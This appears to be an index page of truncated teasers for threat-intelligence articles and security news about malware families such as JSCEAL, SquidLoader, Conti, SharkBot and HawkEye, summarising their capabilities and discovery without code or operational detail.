Hackers Use Facebook Ads to Spread JSCEAL Malware via Fake Cryptocurrency Trading Apps

Cybersecurity researchers are calling attention to an ongoing campaign that distributes fake cryptocurrency trading apps to deploy a compiled V8 JavaScript JSC malware called JSCEAL that can capture data such as credentials and wallets. The activity leverages thousands of malicious advertisements...

Threat Analysis: SquidLoader - Still Swimming Under the Radar

Threat Analysis: SquidLoader - Still Swimming Under the Radar By Charles Crofford · July 15, 2025 Executive summary A new wave of SquidLoader malware samples are actively targeting financial services institutions in Hong Kong. This sophisticated malware exhibits significant evasion capabilities,...

Demystifying Myth Stealer: A Rust Based InfoStealer

Demystifying Myth Stealer: A Rust Based InfoStealer By Niranjan Hegde, Vasantha Lakshmanan Ambasankar and Adarsh S · June 5, 2025 Introduction During regular proactive threat hunting, the Trellix Advanced Research Center identified a fully undetected infostealer malware sample written in Rust. Up...

A Bag of RATs: VenomRAT vs. AsyncRAT

Introduction Remote access tools RATs have long been a favorite tool for cyber attackers, since they enable remote control over compromised systems and facilitate data theft, espionage, and continuous monitoring of victims. Among the well-known RATs are VenomRAT and AsyncRAT. These are open-sourc...

Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware

Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. Remcos RAT "provides purchases with a wide range of advanced features to remotely control computers belonging to the buyer," Fortinet FortiGuard Lab...

New Stealer Uses Invalid Cert To Compromise Systems

New Stealer Uses Invalid Cert To Compromise Systems By Mohinder Gill, Mallikarjun Wali and Sangram Mohapatro · November 07, 2024 A new Stealer has been making the rounds. Its name: Fickle. Fickle Stealer is a new Rust-based information stealer that spreads through various attack vectors, includin...

Hijack Loader Malware Employs Process Hollowing, UAC Bypass in Latest Version

A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar. "These enhancements aim to increase the malware's stealthiness, thereby remaining undetected for longer periods of time," Zscaler ThreatLabz...

Raspberry Robin Malware Upgrades with Discord Spread and New Exploits

The operators of Raspberry Robin are now using two new one-day exploits to achieve local privilege escalation, even as the malware continues to be refined and improved to make it stealthier than before. This means that "Raspberry Robin has access to an exploit seller or its authors develop the...

Researchers Unveil GuLoader Malware's Latest Anti-Analysis Techniques

Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing...

Turla Updates Kazuar Backdoor with Advanced Anti-Analysis to Evade Detection

The Russia-linked hacking crew known as Turla has been observed using an updated version of a known second-stage backdoor referred to as Kazuar. The new findings come from Palo Alto Networks Unit 42, which is tracking the adversary under its constellation-themed moniker Pensive Ursa. "As the code...

Typhon Stealer back with new variant named Typhon Reborn

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Typhon Stealer, a malware who became widely known for its capabilities to steal crypto wallets, monitor keystrokes, and evade antivirus programs, became widely known in early August 2022. Soon after, the...

SharkBot Android banking Trojan cleans users out

Researchers have discovered and analyzed a new Android banking Trojan that allows attackers to steal sensitive banking information such as user credentials, personal information, current balance, and even to perform gestures on the infected device. According to the researchers, SharkBot...

Alert — There's A New Malware Out There Snatching Users' Passwords

A previously undocumented malware downloader has been spotted in the wild in phishing attacks to deploy credential stealers and other malicious payloads. Dubbed "Saint Bot," the malware is said to have first appeared on the scene in January 2021, with indications that it's under active developmen...

APT Attack Injects Malware into Windows Error Reporting

A campaign that injects malware into the Windows Error Reporting WER service to evade detection is potentially the work of a Vietnamese APT group, researchers said. The attack, discovered on Sept. 17 by researchers at Malwarebytes Threat Intelligence Team, lures its victims with a phishing campai...

Egregor Ransomware Threatens 'Mass-Media' Release of Corporate Data

A freshly discovered family of ransomware called Egregor has been spotted in the wild, using a tactic of siphoning off corporate information and threatening a “mass-media” release of it before encrypting all files. Egregor is an occult term meant to signify the collective energy or force of a gro...

TAU Threat Discovery: Conti Ransomware

Conti is a new family of ransomware observed in the wild by the Carbon Black Threat Analysis Unit TAU. Unlike most ransomware, Conti contains unique features that separate it in terms of performance and focus on network-based targets. Conti uses a large number of independent threads to perform...

Threat Analysis Unit (TAU) Threat Intelligence Notification: CrescentCore (macOS)

In June of 2019, researchers at Intego discovered a new Trojan for macOS systems which they named CrescentCore. Much like Shlayer and other common malware targeting macOS systems, CrescentCore is often delivered via a fake Adobe Flash Player installer or updater. This malware employs multiple...

Malspam Campaigns Distribute HawkEye Keylogger, Post Ownership Change

The HawkEye malware kit and information-stealer has been spotted in a newfound slew of campaigns after a recent ownership change. While the keylogger has been in continuous development since 2013, in December a thread on a hacking site noted an ownership change, after which posts on hacking forum...

What we learned by unpacking a recent wave of Imminent RAT infections using AMP

This blog post was authored by Chris Marczewski Cisco Talos has been tracking a series of Imminent RAT infections for the past two months following reported data from Cisco Advanced Malware Protection's AMP Exploit Prevention engine. AMP successfully stopped the malware before it was able to infe...

Frida-Wshook - Script Analysis Tool Based On Frida.re

frida-wshook is an analysis and instrumentation tool which uses frida.re to hook common functions often used by malicious script files which are run using WScript/CScript. The tool intercepts Windows API functions and doesn't implement function stubs or proxies within the targeted scripting...